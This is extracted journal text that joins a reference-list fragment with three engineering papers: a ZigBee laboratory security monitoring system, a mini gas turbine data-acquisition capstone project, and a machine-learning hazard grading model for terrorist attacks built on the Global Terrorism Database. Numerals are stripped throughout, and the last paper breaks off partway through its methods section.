marshall mn. . sampling for qualitative research. family practice ( ): – doi . /fampra/ . . . matthews t, whittaker s, badenes h, smith b. . beyond end user content to collaborative knowledge mapping: interrelations among community social tools. in: proceedings of the th conference on computer supported cooperative work & social computing. new york: acm, – . mcdonald n, goggins s. . performance and participation in open source software on github. in: chi’ extended abstracts on human factors in computing systems. new york: acm, – . singer l, figueira filho f, cleary b, treude c, storey m-a, schneider k. . mutual assessment in the social programmer ecosystem: an empirical investigation of developer profile aggregators. in: proceedings of the conference on computer supported cooperative work. new york: acm, – . singer p, flöck f, meinhart c, zeitfogel e, strohmaier m. . evolution of reddit: from the front page of the internet to a self-referential community? in: proceedings of the rd international conference on world wide web. new york: acm, – . storey m-a, singer l, cleary b, figueira filho f, zagalsky a. . the (r) evolution of social media in software engineering. in: proceedings of the future of software engineering. new york: acm, – . strauss al. . qualitative analysis for social scientists. cambridge: cambridge university press. van liere d. . how far does a tweet travel?: information brokers in the twitterverse. in: proceedings of the international workshop on modeling social media . new york: acm, : – : . wenger e. . communities of practice: learning, meaning, and identity. cambridge: cambridge university press. wenger ec, snyder wm. . communities of practice: the organizational frontier. harvard business review ( ): – . wu y, kropcznyski j, prates r, carroll jm. . the rise of curation on github. in: third aaai conference on human computation and crowdsourcing . wu y, kropczynski j, shih pc, carroll jm. . exploring the ecosystem of software developers on github and other platforms. in: proceedings of the companion publication of the th conference on computer supported cooperative work & social computing. new york: acm, – . ye y, kishida k. . toward an understanding of the motivation of open source software developers. in: proceedings of the th international conference on software engineering. piscataway: ieee, – . zhong c, shah s, sundaravadivelan k, sastry n. . sharing the loves: understanding the how and why of online content curation. in: proceedings of the seventh interna- tional aaai conference on weblogs and social media. – . wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /fampra/ . . http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - design and research of security system in university laboratory ding li school of health services management xi’an medical university, xi’an, shaanxi, china e-mail: dingli@xiyi.edu.cn shi xuerong school of health services management xi’an medical university, xi’an, shaanxi, china e-mail: @qq.com zhang dujuan school of health services management xi’an medical university, xi’an, shaanxi, china e-mail: zhangdj sx@ .com su yulei school of health services management xi’an medical university, xi’an, shaanxi, china e-mail: @qq.com abstract—the laboratory is an important place for teaching and scientific research in major universities, and plays an important role in the work of universities. the resources equipped by the laboratory occupy a large part of the resources of the entire school. the laboratory security system plays an important role in ensuring the safety of the laboratory and preventing the loss of equipment. today's laboratory security systems have factors such as low automation, insufficient management, and inadequate safety in the experimental environment. moreover, most security systems are built using wired methods, which have problems such as cumbersome wiring, aging lines, and difficult maintenance. in view of the many problems in the current laboratory management, this paper proposes a security system designed and implemented by the zigbee technology of the internet of things. the system uses a wireless network to monitor laboratory access control and the environment, realizing the intelligence of the laboratory security system. keyword-internet of things (iot); sensor; security i. introduction in the field of security, with the diversification of networking methods, hardware and software platforms and application technologies, the implementation of security systems has become more and more diverse. at present, the laboratory security system has a large number of alarm constraints and redundancy, and poor real-time monitoring. in response to this series of problems, this paper uses the internet of things and other related technologies to carry out research work on the laboratory security system design, and proposes a set networked laboratory security system. the system uses sensor design nodes to form a zigbee wireless sensor network to realize the collection of environmental information in the laboratory, thereby automatically monitoring the occurrence of some security risks. ii. iot technology internet of things (abbreviation: iot) originated in the media field and is the third revolution of the international journal of advanced network, monitoring and controls volume , no. , information technology industry[ ]. the internet of things refers to connecting any object with the network through information sensing equipment according to the agreed protocol, and the objects exchange information and communicates, through the information transmission medium to achieve intelligent identification, positioning, tracking, supervision and other functions. there are two key technologies in iot applications, namely sensor technology and embedded technology[ ]. unlike traditional networks, the terminal of the internet of things technology is no longer a pc, and its terminal is an embedded computer system and its supporting sensors. the internet of things technology is widely used in industrial, medical, transportation and other fields. iii. network topology a typical zigbee network supports three topologies, namely a star network topology, a tree network topology, and a mesh network topology. the star network topology is composed of a network main coordinator and multiple terminal equipment nodes. the main coordinator node is an ffd device. in a star topology, each terminal node can only communicate with the coordinator node, and each terminal node cannot transmit data. the tree topology is composed of a network coordinator and multiple terminal equipment nodes and routing nodes. the main coordinator and the routing node can have their own child nodes, and the terminal device node can autonomously choose to join the coordinator or the router node. the tree structure follows the order of parent node and child node, that is, each terminal node has its fixed parent node, which must be passed through the parent node layer by layer. the advantage of this topology is that the network coverage is large, but if one of the parent nodes is damaged, all the child nodes connected to it will be unable to communicate. the mesh topology is also composed of a coordinator node, multiple terminal device nodes and router nodes. this structure is different from the tree network structure in that all routing nodes can communicate with each other, and there is no strict communication sequence. when a routing node fails, data can be transmitted through other routing nodes. this topology not only reduces the delay of information transmission, but also improves the routing efficiency and reliability. through the corresponding routing algorithm, the best path can be found. according to the current status of the laboratory, the range of experiments that need to be monitored is large, and the types of data monitored are many. from a practical point of view, the wireless network that needs to be established can dynamically delete and add nodes at any time. according to these characteristics, choosing a mesh topology is more suitable for the current laboratory system. the mesh topology has a strong stability and has a strong advantage in a large-scale laboratory monitoring system. iv. structure design of laboratory security system the laboratory security system mainly relies on the monitoring of the laboratory environment to determine potential safety hazards or the presence of suspicious persons[ ]. various types of sensors are arranged in the monitoring range. these sensors are connected to the terminal nodes and placed in different locations in the laboratory. the system uses infrared sensors to monitor whether there are people in the room, door magnetic sensors to detect whether someone breaks into the window, smoke and temperature sensors to detect the presence of fire in the laboratory, and harmful gas sensors to detect the leakage of pharmaceutical reagents. when an abnormality occurs, the sensor in the detection unit will send out an alarm signal, and the alarm signal will be transmitted through the communication unit to the monitoring center software via the zigbee network. the structure of the laboratory security system is shown in figure . international journal of advanced network, monitoring and controls volume , no. , sensor node routing node laboratory monitoring area coordinator node pc zigbee figure . laboratory security system structure v. system hardware design a. monitoring unit design the detection unit is mainly composed of an infrared sensor, a door magnetic sensor, a smoke sensor, a temperature sensor, a harmful gas and a combustible gas sensor module. the infrared sensor is mainly used to detect whether there are outsiders in the laboratory. the system uses a pyro electric infrared sensor, which mainly detects the infrared radiation radiated by the human body in a non-contact manner to determine whether someone is in the surveillance area. this system uses the human body infrared sensor module hc-sr . this module is fully automatic. when someone enters the sensing range, the module will automatically output high level. if it can always feel the presence of the person, it will always output high level. ,after detecting the existence of human, it will switch from output high level to output low level. the wireless door magnetic sensor is a device commonly used in security systems, mainly used to detect whether the doors and windows are opened or closed illegally. when the wireless door sensor collects the signal that the door sensor is open, it sends an alarm signal. the combustible gas sensor is a detector used to detect the combustible gas content in the air. the system uses the mq- sensor to measure the combustible gas concentration[ ]. when the sensor detects that the combustible gas content in the air reaches or exceeds the threshold, it sends an alarm signal. the temperature sensor adopts ds b digital sensor, which is small in size and easy to use. the interface mode is single wire, which can realize the networking function of multiple sensors. the harmful gas sensor module minds the effective detection of many gases such as ammonia, sulfide, methane, and carbon monoxide. the mq sensor is used for the detection of harmful gas content[ ]. b. communication unit design the communication unit is mainly responsible for data transmission in the wireless sensor network environment monitoring system, which is the core part of the entire system. data is transmitted through a large number of wireless sensor network nodes arranged in the network. the mutual communication between the various nodes realizes the communication of the entire network and forms the communication unit of the system. the node structure designed in the wireless international journal of advanced network, monitoring and controls volume , no. , sensor network is shown in figure . it is mainly composed of three parts: wireless node module, sensor module and power intelligent main board. power motherboard c c w ire le ss in te rfa ce in te rfa ce single chip microcomputer se n so r r s sensor module m ic ro c o n tro lle r figure . wireless sensor network node the microcontroller in the sensor module selects stc c rc produced by stc. the controller has the characteristics of high speed and low power consumption. it uses an enhanced core, the calculation speed is higher than the ordinary . the controller can wake up the idle mode at any time to reduce power consumption and ensure that the end node power supply is used for a longer time. the wireless node module selects cc chip as the microcontroller of the module. the cc chip is compatible with various zigbee standards, and has the characteristics of stable performance, low power consumption, and strong anti-interference ability[ ]. the sensor module is arranged in the monitoring environment and is responsible for data collection and transmission in different areas, and transmits the collected data information to the coordinator. if it cannot be directly transmitted, it is transmitted to the coordinator in a multi-hop manner. the design part of the power module chooses to use an input voltage of v, and the microcontroller and various sensors on the front-end measurement version use a v power supply[ ]. the zigbee module cc uses a . v power supply, so the system uses a voltage regulator to convert the v voltage it is v voltage. at the same time, the v voltage is reduced to . v through the voltage regulator tube, which is used to provide power for the zigbee module. vi. system software design zigbee is a wireless transmission technology based on the ie . . standard specification[ ]. it has the characteristics of self-organizing network, low cost, low power consumption, and enemy complexity [ ]. it does not need to apply for authorization for the working frequency band, which is convenient and cost-effective to use. the system uses zigbee to develop a set of wireless sensor networks according to the actual monitoring needs in the laboratory, and the data transmission between the nodes in the network is transmitted using the zigbee protocol. the laboratory monitoring system mainly includes terminal node coordinator, terminal node and routing node. the coordinator is responsible for forming a network, collecting data, and providing an interface with a computer to realize the formation of a sensor network and the establishment of a data transmission channel. the terminal node is responsible for collecting data information in the laboratory, including temperature, smoke, and harmful gases. these data are processed by the microcontroller, transmitted to the zigbee network via the wireless network module, and finally transmitted to the coordinator, which is then transmitted to the monitoring center to realize the collection and transmission of laboratory environmental data. the routing node is responsible for the signal enhancement and forwarding of the data. because the monitoring area is large, some data may be lost during the transmission process. to avoid this situation, a routing node is designed in the network to enhance and forward the data signal. , to ensure the stability and accuracy of data transmission throughout the network.. a. terminal node design ) design of sensor data acquisition module international journal of advanced network, monitoring and controls volume , no. , the system data acquisition module uses -microcontroller, through c language programming, to achieve sensor status and data acquisition, judgment and so on. these data are sent to the wireless network through the zigbee module and transmitted to the coordinator. the flow chart of the sensor data acquisition module software design is shown in figure . get command data collection determine whether the test command is received cyclic detection of sensor data determine if there is an exception send to coordinator or router end start no yes no obtain yes figure . software design flow chart of information collection module after the data acquisition module software is running, it reads the background from the serial port of the zigbee module to obtain background commands, collects the status of the sensors connected to the module, and sends the data to the network. if there is no background acquisition command, the program cyclically executes the acquisition sensor status command, and judges whether there is an abnormal situation in the laboratory through the sensor status data. if abnormal data appears, send laboratory status data to the monitoring center, and if there is no abnormality, continue to collect laboratory sensor data. ) wireless network module design the information collected by each terminal node in this system is different. according to different sensors, multiple data will be collected within the scope of laboratory monitoring. in order to realize the data transmission in the system, it is necessary to establish a network and add these terminal nodes to it. in this system, the terminal node sends a request to join the network to the coordinator. the coordinator determines whether to allow joining according to the situation, responds to the request and sends it to the terminal node, so as to join the network and perform data transmission. the flow chart is shown in figure . initialization send a signal to join the network is it successful to join the network? start data collection yes whether an alarm signal is detected send alarm information yes no no figure . end node flow chart international journal of advanced network, monitoring and controls volume , no. , the terminal node first finds the coordinator node in the network, and scans again if it is not found until it is found. then send the association request command, wait for the coordinator to process, if you agree, then join the network, and get a short -bit address assigned, the terminal node sends data to the coordinator through the network. b. coordinator node design the main role of the coordinator is to create the entire network and serve as a bridge between the terminal nodes and the control center. it needs to receive all kinds of data collected by terminal nodes and routing nodes through zigbee wireless communication protocol, and then send it to the monitoring center. in the entire system, the coordinator must be a full-function device, and there can only be one coordinator node in a network, so the coordinator initialization setting is required at the time of design. the flow chart is shown in figure . the coordinator in the network is responsible for constructing the entire network, and adopts the method of ad hoc network to construct. ) determine network coordinator the process is to determine whether the node is an ffd node, and then to determine whether the ffd node is in another network or whether a coordinator already exists in the network[ ]. through active scanning, send a beacon request command, and then set a t_scan_duration, if no beacon is detected within the scanning period, then it is considered that ffd does not have a coordinator in the entire network, it can build your own zigbee network, and as this the network coordinator continuously generates beacons and broadcasts them. ) carry out the channel scanning process it includes two processes: energy scanning and active scanning. first, perform energy detection on the specified channel or the default channel to avoid possible interference. then carry out active scanning to search for network information within the communication radius of the node. this information is broadcast on the network in the form of beacon frames. the node obtains these beacon frames through active channel scanning, and then selects a suitable channel based on this information. initialization create a new network display network information enter the wireless monitoring state is there an application signal? whether there is an alarm signal? no send an alarm signal yes assign network number yes no figure . coordinator node program flow chart ) set the network id after finding a suitable channel, the coordinator will select a network identifier (pan id) for the network. there are two address modes in the zigbee network: extended address ( -bit) and short address ( -bit), where the extended address is assigned by the ieee organization and is used for unique device identification. international journal of advanced network, monitoring and controls volume , no. , after the above steps are completed, the zigbee mesh network is successfully initialized, and then waits for other nodes to join. after the node successfully joins the network, it will get a short network address and send and receive data through this address. the flow chart of ad hoc network is shown in figure . initialization set panid and channel build a network and allow to join wait for the node to join whether the node joins the network? yes no receive data start figure . coordinator ad hoc network flow chart c. design of routing nodes as a relay node of the entire detection system, routing nodes are suitable for environmental monitoring in a large area. in wireless sensor networks, it may not be possible to connect and communicate because of the long distance between nodes. at this time, the routing node acts as a relay station to connect the terminal node and the coordinator. when setting up a routing node, you need to first initialize the cc device and protocol stack, send a signal to join the network, the front-end coordinator will respond accordingly, agree to join the network, and assign a network address. after the routing node joins the network, it starts the function of data forwarding, thereby ensuring the transmission of data throughout the network. the program flow figure is shown. initialization join the network enter the wireless monitoring state determine the signal received forward to next node no assign addresses to nodes yes signals to join the network alarm figure . routing node flow chart vii. communication protocol design communication protocol refers to the rules and conventions that both entities must follow to complete communication or services. the protocol defines the format used by the data unit, the information and meaning that the information unit should contain, the connection method, and the timing of information transmission and reception, so as to ensure that the data in the network is smoothly transmitted to the determined place. this system uses wireless communication, a specific communication rule designed for communication in the formulation of protocols. in the formulation of the transmission module protocol, according to the zigbee communication protocol and the needs of the actual system, the communication protocol of this system was formulated. the single transmission format is shown in table . international journal of advanced network, monitoring and controls volume , no. , table i. transmission data format fd indicates that zigbee sends data point to point, and the length indicates the total length of the piece of data. this length can determine how many bits of data need to be read, which is convenient for taking out the data. the target address stores the zigbee address of the received information. the following data represents the laboratory number, data , , and so on represent the data collected by the sensor. each node sets different data according to its sensor. the single data receiving format is shown in table . table ii. transmission data format fd means zigbee point-to-point transmission. the length represents the total length of the data, and the target address represents the zigbee address of the received message, that is, the node address to which the data needs to be sent. data represents the laboratory number. data represents the data information received by the sensor. data and data are also the information received by the sensor. the amount of this information depends on the number of sensors at the terminal node. the source address represents the zigbee address of the sent message, that is, from which node the message was received. viii. conclusion the laboratory security monitoring system mainly monitors the environment in the laboratory to alert the abnormal situation in time to avoid the economic loss caused by aging equipment or human negligence. the development of such a system has a positive effect on the laboratory construction of colleges and universities, and has certain application prospects. references [ ] zhang hui yuan yong-zhe wang wen-jun “security and intelligent system for buses based on mobile internet of things “electronic design engineering. , ( ) - . [ ] sun qi-bo liu jie li shan fan chun-xiao sun juan-juan” internet of things:summarize on concepts,architecture and key technology problem” journal of beijing university of posts and telecommunications. , ( ). - . [ ] liu qiang cui li chen hai-ming “key technologies and applications of internet of things” computer science. , ( ). - . [ ] han tuanjun yin jiwu zhang panfei zheng xu zheng zhengbing.” design of remote laboratory safety management system based on gprs and zigbee” experimental technology and management. , ( ) - . [ ] yan yaling li bo liu weijie.” zigbee-based laboratory fireproof remote monitoring system”. , ( ) - . [ ] jiang yunchen.” monitoring and managing system of laboratory based on campus lan and zigbee technology” experimental technology and management. , ( ). - . [ ] fan yan yu yang li yong-yi ding yi-xing “research on remote monitoring system based on zigbee wireless sensor network” research and exploration in laboratory. , ( ). - . [ ] zhang pan huo lian-song “design of an wireless temperature monitoring system based on zigbee” sensor world. , ( ). - . [ ] wang sihua zheng shuqiang ding yihua “discussion on zigbee sensor network technology and its application” radio engineering. , ( ). - . international journal of advanced network monitoring and controls volume , no. , application of computational tools to analyze and test mini gas turbine haifa el-sadi* , anthony duva mechanical engineering and technology faculty of engineering and computer science wentworth institute of technology boston, ma, usa corresponding author email: elsadih@wit.edu abstract. performance analysis and testing of the mini gas turbine was carried out in wentworth institute of technology’s thermodynamics laboratory. the computational tool allows students to focus on more design-oriented problems. furthermore, students had the ability to see immediate results to variations of the design conditions as well as different parameters that would affect the mini turbine. this project was carried out as a senior design project (capstone), the students updated the existing data acquisition system, writing a new data acquisition program in labview, installing new pressure and temperature sensors, and performing a first and second law of thermodynamics analysis on the engine in engineering equation solver. in order to update the existing data acquisition system, new ni scb- connector blocks were implemented along with ni usb- terminals. the new hardware is operated through a labview program running on a new laptop designated and mounted to the mini jet turbine housing. instrumentation, testing, and calibration are the three main milestones for this project as a result, the inlet mass flow rate numeric indicator value is calculated, not measured. the calculated value is dependent on the measured values of compressor inlet temperature (t ), compressor inlet static pressure (ps), and compressor inlet dynamic pressure (pt-ps). however, the pressure, temperature and thrust were tested as a function of rpm. the mini turbine engine is ready to be used in student experimental settings. feedback from students proves that the use of different tools significantly enhances the student learning experience and encourages the students to use different theory from different courses, make the course more dynamic, and motivate the students to learn the material. keywords: labview, engineering equation solver (ees), mini-turbine, pressure . introduction the turbine engine discussed throughout this research is a self-contained turbojet engine.this engine operates on a brayton cycle. the brayton cycle depicts the air-standard model of a gas turbine power cycle. a simple gas turbine is comprised of three main components: a compressor, a combustor, and a turbine. according to the principle of the brayton cycle, air is compressed in the compressor. the air is then mixed with fuel, and burned under constant pressure conditions in the combustor. the resulting hot gas is allowed to expand through a turbine to perform work. most of the work produced in the turbine is used to run the compressor and the rest is available to run auxiliary equipment and produce application of computational tools to analyze and test mini gas turbine power [ ]. gas turbine engines include internal passages which serve to channel the cooling air from compressors to the different components to be cooled. the research on the flow in a corotation radial inflow cavity was pioneered by owen et al. [ ]. they used integral momentum techniques for flows in a rotating cylindrical cavity. firouzian et al. [ , ] studied the flow and heat transfer in the cavity. their results revealed the complicated source-sink flow feature in a radial inflow rotating cavity. one of the concerns in turbomachine is the pressure loss in the cavity; different ways to minimize the pressure loss have been explored. chew et al. [ ] has used fins to reduce the pressure loss. on the other hand, x. liu [ ] has studied the flow in a corotation radial inflow cavity between turbine disk and coverplate. also, the flow field in a preswirled cooling air supply to a turbine rotor has been investigated by oliver et al. [ , ]. an analysis on this engine provides important performance characteristics such as thrust, compressor performance, turbine performance (work and power, expansion ratio, turbine efficiency), combustion/ emission analysis, and overall isentropic efficiency. in order to perform an analysis on this engine, several quantities at specific locations are needed. sensors are instrumented on this engine at the compressor inlet, compressor outlet, turbine inlet, turbine exit, and exhaust to collect data on the temperature and pressure at each location. this data is then used to perform a performance analysis on the engine. in addition, there are sensors on this engine to monitor thrust, rpm, and fuel flow rate. shown below in figure is a cross section of the engine with main components labeled. figure. turbine engine layout (brayton cycle) figure below shows the location of each temperature and pressure being measured on the engine. international journal of advanced network monitoring and controls volume , no. , figure. engine instrumentation locations shown below in table are the specifications of the engine. table engine manufacturer specifications manufacturer turbine technologies, ltd. model number dx max. rpm , max. exhaust temperature c pressure ratio . : specific fuel consumption . lb./lb.-hr t h e t u r b i n e t e c h n o l o g i e s m i n i g a s t u r b i n e i n t h e w e n t w o r t h i n s t i t u t e o f t e c h n o l o g y thermodynamics lab is in great need of an instrumentation overhaul. due to the high cost of replacing the data acquisition system completely, our team will be replacing it ourselves. the current daq system is outdated and incompatible with current software on the computer it is paired to. a new set of daq hardware will be paired with a new computer running a labview program to collect the data. our team’s goals also include calibration of pressure transducers and thermocouples for accurate measurement. our team will then run a st and nd law of thermodynamics on the system using engineering equation solver (ees). the mini gas turbine in the thermodynamics lab is a fantastic resource that is going un-used. many students can benefit from the mini turbine’s technical sophistication. benefits include but are not limited application of computational tools to analyze and test mini gas turbine to technical understanding, conceptual understanding, and practical application. with the recent creation of the aerospace engineering minor at wentworth, this machine could open the eyes to many young engineers and give them the ability to have a future in the aerospace industry. turbine propulsion is used on various aircraft, but dominates the commercial jet and military jet industries. the main problem of this project is to overhaul the instrumentation of the mini gas turbine and have it ready to be run for students. instrumentation, testing, and calibration are the three main milestones for this project. a technical lab will be produced for thermodynamics students to run. . instrumentaion figure below shows the laptop system mounted and installed. figure. laptop and monitor installed the new daq has several additional components which are much larger than the old system a much larger mounting bracket was necessary. after modeling all of the current system components in solidworks, a sheet metal bracket was designed to fit all of the daq components without interfering with any of the existing surrounding components. figure below shows the design of the new daq setup. figure. daq components installed international journal of advanced network monitoring and controls volume , no. , during the course of this project, there were many sensors that needed to be changed or added. the preexisting daq system was capable of collecting temperature and pressure readings from the various mini-turbine engine stages; however, there was room for improvement. one of the main additions made to the instrumentation was implementing a new pressure transducer to read the static pressure at the inlet of the nozzle. the pitot-static mast style device can be seen below in figure : figure. inlet pitot tube current set-up the basis of this project is to transition the new hardware and supported labview software. the hardware chosen for the task are the ni scb- and ni usb- . two of each have been implemented in the daq system. while attempting to calibrate the thrust strain gauge, significant noise to the ni chassis was experienced. the pre-existing set-up had the wires from the strain gauge splitting between the meter and the ni chassis. while the out-put signal from the strain gage was filtered through the dp -s, it was not filter through the ni chassis. to remedy the issue, the dp -s was replaced with a dp -s-a which had the correct analog signal output. with the new signal analog signal output, there was no noise experienced from the thrust strain gage and meter. below the new meter can be seen: . testing figure . labview data acquisition front panel user interface (plot tab) in order to calculate the inlet mass flow rate to the turbine engine, the static pressure is needed. the static pressure is obtained by connecting a pressure transducer directly to the static pressure port on the inlet pitot tube. next, the density of the air is calculated using this static pressure. the air velocity is calculated next using the dynamic pressure which is the difference between the total pressure and the static pressure. the mass flow rate is finally obtained knowing the density, velocity and cross sectional area of the inlet nozzle at the location of the pitot tube. this calculation is performed in the labview program (figure ). see following report section for mass flow rate governing equations. the fuel flow rate is determined from measuring the fuel pressure. if the fuel pressure as well as the fuel properties are known, the flow rate can be determined. the inlet mass flow rate numeric indicator application of computational tools to analyze and test mini gas turbine value is calculated, not measured. the calculated value is dependent on the measured values of compressor inlet temperature (t ), compressor inlet static pressure (ps), and compressor inlet dynamic pressure (pt-ps). using express formula functions, the density of the air is first calculated, then the velocity of the air is calculated, and finally the inlet mass flow rate can be calculated. the following equations are contained within these functions for density (ρ), velocity (v) and mass flow rate (ṁ). where, a = compressor inlet area r = ideal gas constant for air figure shows the inlet mass flowrate vs. rpm figure. mass flow rate calibration figure. labview block diagram international journal of advanced network monitoring and controls volume , no. , . engineering equation solver (ees) one of the critical tasks was to create a program in ees which analyzes the engine using the first and second laws of thermodynamics. ideally this program would be displayed on the second monitor so you can take the data directly from labview and plug it into the ees program. after plugging in the different temperatures and pressures as inputs in the ees program, it will calculate the compressor efficiency, turbine efficiency, overall efficiency of the engine and the thrust of the engine. a diagram window interface was created in ees to make it easy for the user to run the program without understanding the entirety of the code. figure below shows the equations window section of the ees program. figure. ees code figure. engine testing data plot – thrust vs rpm a sample set of data collected from an engine test run is shown in figure through figure . these plots contain important characteristics of the engine such as the relationship between engine rpm and thrust, temperature, inlet mass flow rate, and pressure. figure. engine testing data plot – inlet mass flow rate vs rpm application of computational tools to analyze and test mini gas turbine . conclusion this paper explored the use of computational tools to enhance the students’ understanding of the different gas turbine engine processes and apply the theory such as conservation of mass and energy which were learned in different courses such as thermodynamics and fluid mechanics. the computational tool such as ees allows the students to focus on the fundamental concepts of energy equation and second law of thermodynamics to yield quicker final results. the completion of this capstone project produced quality and timely task completion. the mini turbine engine is now ready to be used in student experimental settings. each data acquisition component of the system is calibrated including all thermocouples and pressure transducers, rpm measurement and thrust measurement. the labview program will be used for real time data display and data acquisition of the complete run cycle of the system. using this data exported to excel by the labview program, these values can be inputted into the first and second law of thermodynamics ees program to determine the efficiencies of the compressor, turbine, and the overall system as well as the work done by the system in btu/hr. the senior students completed their tasks and sub-tasks and achieved their final goal. these tasks and sub- figure. engine testing data plot – pressure vs rpm figure. engine testing data plot – temperature vs rpm international journal of advanced network monitoring and controls volume , no. , tasks include but are not limited to preliminary research and component identification, mounting of a new laptop arm and laptop, design and manufacturing of a mounting bracket for the daq hardware, an ees program, a daq and user-friendly display labview program. it can be concluded that using senior students. feedback from students, proved that the use of computational tools significantly enhances the student learning experience while motivating the students to learn the different mini turbine processes. references [ ] moran, michael j., and howard n. shapiro. fundamentals of engineering thermodynamics. seventh ed. new york: wiley, . print [ ] [ ] owen, j.m., pincombe, j.r. and rogers, r.h., “source-sink flow inside a rotating cylindrical cavity” , j. fluid mech., vol. , , - . [ ] firouzian, m.o., owen, j.m., pincombe, j.r. and rogers, r.h., “flow and heat transfer in a rotating cylindrical cavity with a radial inflow of fluid. part : the flow structure”, int. j. heat and fluid figure. ees code application of computational tools to analyze and test mini gas turbine flow, vol. , , - . [ ] firouzian, m.o., owen, j.m., pincombe, j.r. and rogers, r.h., “ flow and heat transfer in a rotating cylindrical cavity with a radial inflow of fluid. part : velocity, pressure and heat transfer measurements”, int. j. heat and fluid flow, vol. , , - . [ ] chew, j.w., farthing, p.r., owen, j.m. and stratford, b., “ the use of fins to reduce the pressure drop in a rotating cavity with radial inflow”, j. turbomachinery, vol. , , - . [ ] x. liu, “flow in a corotation radial inflow cavity between turbine disk and coverplate”, int. gas turbine & aeroengine congress & exhibition, orlando, florida, . [ ] oliver popp, horst zimmermann, and j. kutz, “ cfd-analysis of coverplate receiver flow”, int. gas turbine & aeroengine congress & exhibition, birmingham,uk, . [ ] haifa el-sadi, grant guevremont, remo marini, sami girgis, “cfd study of hpt blade cooling flow supply systems”, asme turbo expo : power for land, sea and air,may - , , montreal, canada paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , hazard grading model of terrorist attack based on machine learning yu jun school of computer science and technology xi'an technological university xi'an , shaanxi, china e-mail: yujun@xatu.edu.cn xian tong school of computer science and technology xi'an technological university xi'an, , shaanxi, china hu zhiyi institute of engineering design army academy of pla beijing, , china liu yutong engineering design institute army academy of pla beijing, , china abstract—in this paper, there is no unified grading standard for the harm of terrorist attacks. a classification model of terrorist incidents based on machine learning is proposed. first, the data related to the hazard in the global terrorism database (gtd) is extracted and preprocessed. secondly, the data is extracted by principal component analysis, and all events are aggregated into by k-means clustering. again, the entropy method is used to calculate the weighting coefficient of each indicator, and the comprehensive score of the hazard of each type of terrorist attack is calculated. finally, the scores are divided into - levels of hazard grading models in order of high to low. the results show that the hazard grading model can scientifically and objectively quantify terrorist attacks. keywords-terrorist attacks; hazard; hierarchical model; principal component analysis; k-means clustering; entropy method i. introduction a terrorist attack is an aggression committed by an extremist or organization that is not in conformity with international morality and is directed against, but not limited to, civilians and civilian installations. it not only has great destructiveness and destructive power, but also directly causes huge casualties and property losses. it also brings tremendous psychological pressure to people, causing a certain degree of turmoil in society and greatly hindering economic development. global terrorism is a phenomenon of public interest, and everyone is directly affected by it. therefore, anti- terrorism work is imminent. big data is now the main source of counter-terrorism intelligence. the global terrorism database (gtd) is the world's most comprehensive database of non-confidential terrorist attacks, containing more than , terrorist attacks, each containing at least variables. an in-depth analysis of data related to terrorist attacks will help deepen people's understanding of terrorism and provide valuable information support for opposing terrorism and preventing terrorism. data collection and preprocessing intelligence are the lifeblood of counter- terrorism work. keeping reliable information in a timely manner can play an active role in combating terrorism and effectively curb the spread of terrorism[ ]. grading catastrophic events (such as earthquakes, traffic accidents, meteorological disasters, etc.) is an important task of social management. the usual grading generally adopts a subjective method, and the authority stipulates the grading standard. the harmfulness of terrorist attacks depends not only on the two aspects of casualties and economic losses, but also on the timing, geography, and targeted objects. therefore, it is difficult to fully reflect these factors. the hazard grading of terrorist incidents can clearly define the future attacks, and different levels of events correspond to different treatments. this will not only help the management of social security, but also avoid unnecessary waste of manpower and property. combined with big data processing technology, this paper establishes a hierarchical model based on pca algorithm, k-meas clustering algorithm and entropy method. first, evaluation indicators related to the hazard of the event were selected to preprocess the doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , existing data. secondly, the pca method was used to reduce the index from dimensions to dimensions, and the reduced dimension vector was obtained by the clustering algorithm. gather into categories, you can get the category corresponding to each event. finally, using the entropy method to score the hazard of each event and according to the average hazard score of each class. according to the degree of harm from high to low levels to . a hazard grading model of terrorism events is obtained with a hazard rating of . ii. data preprocessing in this paper, the hazard grading model of terrorism events data is established from some important fields of the gtd original database. the selected data handling requires missing value processing, conversion of characters to numeric values and numerical processing. a. important field selection the important field of hierarchical is pointed out by the world anti-terrorism incident research. the terrorism hazard classification model data table has selected the following fields from gtd, as shown in table . table i. the selected field table field description extended whether it is a continuous event latitude latitude longitude longitude success successful attack suicide suicide attack nkill total number of deaths propextent degree of property damage nwound total number of injuries country country region area city city attacktype attack type targtype target/victim type weapontype weapon type b. missing value processing in the selected field, python's function dataframe. dropna can delete rows or columns with null values, and retain all data that is not empty. then the character field needs to be converted to a numeric field. c. converting character fields to numeric fields the character field that need to be converted is as follows: ) eventid: events in the gtd are numbered with digits. the first digits are recorded in the format "yyyymmdd". the last digits calibrate the serial number of the day, e.g. , etc. ) country: according to the developed economies assessment standards recognized by the united nations, countries are divided into developed and underdeveloped countries. since terrorist attacks are more harmful to developed countries, the relevant assignments are shown in table . . ) region: count the frequency of terrorist incidents in each region and assign the frequency to regional indicator values. ) city: the world city is divided into three levels: the capital, the provincial capital, and other cities. since the terrorist attacks are more harmful to the political and economic centers, the relevant assignments are shown in table . . ) attack type: counting the frequency of occurrence of types of attacks, and assigning the frequency to the attack type indicator value. ) weapon type: counting the frequency of occurrence of weapon types, and assigning this frequency to the weapon type indicator value. ) targtype: counting the frequency of occurrence of target types, and assigning this frequency to the target type indicator value. table ii. the state and city assignment index assignment developed countries underdeveloped countries the capital the provincial capital other cities international journal of advanced network, monitoring and controls volume , no. , d. numerical processing in the original gtd database, the nkill field includes the number of all victims and terrorists who directly caused death from terrorist incidents. we use only requires the number of victims and does not require the death toll of terrorists. therefore, the number of victims is obtained by subtracting the number of terrorist deaths (nkiller) from the total number of deaths. iii. terrorist attack hazard classification model in this paper, the pca algorithm, k-means clustering algorithm and entropy method are used to classify the terrorist attacks. the process of building a hierarchical model is divided into four steps: ) the indicators with greater influence is standardized by pca algorithm. we construct a - dimensional matrix, and then reduce the matrix from dimensions to dimensions. ) the k-means algorithm is used to cluster all the terrorist events in the matrix into five major categories, i.e. five hazard levels. ) using the entropy weight method finds the weights of each of the indicators, and then weighting and summing the indicators of each event to obtain the score of the event. for each hazard level, finding the average score for all events is at that level. ) sorting by the average scores of the five hazard levels, we divide them into one to five grades from high to low. the higher score means the greater damage. a. using the pca algorithm for dimensional reduction principal component analysis (pca) extracts m- dimensional feature matrices from n-dimensional matrices. first, we calculates eigenvalues and eigenvectors of 